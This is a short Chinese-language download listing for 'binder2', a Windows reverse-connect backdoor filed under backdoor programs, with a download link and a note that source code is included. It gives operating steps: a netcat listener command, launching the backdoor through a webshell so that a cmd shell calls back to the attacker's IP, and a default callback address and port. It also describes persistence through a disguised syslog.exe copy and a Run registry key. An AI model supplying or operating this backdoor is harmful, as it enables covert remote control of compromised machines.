binder2.rar提交时间:2003-07-24 提交用户:lw 工具分类:后门程序 运行平台:Windows 工具大小:12016 Bytes 文件MD5 :1e53ccf0083c2ceaf186ac689c06802a 工具来源:http://haowawa.8866.org binder2.exe 反弹式后门程序 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\winnt\下名为syslog.exe,并在 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用. Code by threat. THX! :) >> 下载 << |
